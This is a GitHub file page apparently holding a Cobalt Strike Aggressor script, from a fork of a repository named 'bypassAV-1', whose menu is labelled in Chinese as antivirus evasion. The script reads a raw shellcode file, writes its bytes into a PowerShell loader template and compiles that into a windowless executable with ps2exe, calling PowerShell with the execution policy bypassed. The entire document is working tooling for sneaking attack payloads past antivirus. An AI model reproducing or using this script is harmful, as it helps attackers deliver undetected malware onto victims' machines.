forked from q-a-z/bypassAV-1
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpowershell_bypass.cna
74 lines (65 loc) · 2.65 KB
/
powershell_bypass.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
menubar("powershell免杀","powershell");
popup powershell {
item("&生成exe",{dialog_powershell()});
}
$path = "F:\\cstemp\\";
$output_file = $path."output";
global('$char_code');
global('$new_strs');
sub payload_bin_to_ps1 {
$in = openf($bin_path);
$data = readb($in, -1);
for ($x = 0; $x < strlen($data); $x++)
{
$shellcode = (byteAt($data, $x) . ",");
$char_code = $char_code.$shellcode;
}
$char_code = left($char_code, int(strlen($char_code)) - 1);
$org_file = $path.'powershell_load.ps1';
$handle = openf($org_file);
while $text (readln($handle)){
$rep = replace($text, 'acode.*=.*', 'acode='.$char_code)."\n";
$new_strs = $new_strs.$rep;
}
$filestring = right($new_strs, int(strlen($new_strs)) - 1);
$out = openf(">$payload_file_ps1");
writeb($out, $filestring);
closef($out);
closef($in);
$new_strs = '';
$char_code = '';
}
sub show {
$bin_path = $3["bin"];
$payload_file_ps1 = $output_file.'\\'.$3["payload"];
$output_exe = $output_file.'\\'.$3["output_exe"];
$ps2exe = $path.'\.\\ps2exe.ps1';
mkdir($output_file);
if (-exists $bin_path) {
payload_bin_to_ps1($bin_path,$payload_file_ps1);
$version = right($3["version"], 3);
$int_version = left($version, 1);
println($payload_file_ps1);
if ($int_version == "4") {
$process = exec('powershell.exe -ExecutionPolicy bypass -command "'.$ps2exe.' -inputFile '.$payload_file_ps1.' -outputFile '.$output_exe.' -noConsole -runtime40" ');
} else {
$process = exec('cmd.exe /c echo '.$ps2exe.' -inputFile '.$payload_file_ps1.' -outputFile '.$output_exe.' -noConsole -runtime20 | powershell -');
}
@data = readAll($process);
println(@data);
closef($process);
show_message("\n加载bin文件:".$bin_path."\n输出payload文件:".$payload_file_ps1."\n版本是:".$3["version"]."\n输出exe地址:".$output_exe);
} else {
show_message('请指定bin文件');
}
}
sub dialog_powershell {
$info = dialog("powershell bypass av",%(ps2exe => "ps2exe.ps1",bin => "payload.bin",payload => "payload_cs.ps1",version => "4.0",output_exe => "bypass.exe"),&show); #第一个是菜单的名字,第二个是我们下面定义的菜单显示内容的默认值,第三个参数是我们回调函数,触发show函数的时候显示,并将我们的输入值传递给他
# drow_text($info,"ps2exe","ps2exe.ps1");
drow_file($info,"bin","Choose: default payload.bin");
drow_text($info, "payload", "生成ps1");
drow_combobox($info, "version", "Version: ", @("powershell 4.0", "powershell 2.0"));
drow_text($info,"output_exe","输出地址:");
dbutton_action($info,"点击生成!"); # dbutton_action将操作按钮添加到dialog,回调函数
dialog_show($info); # 显示文本输入框
}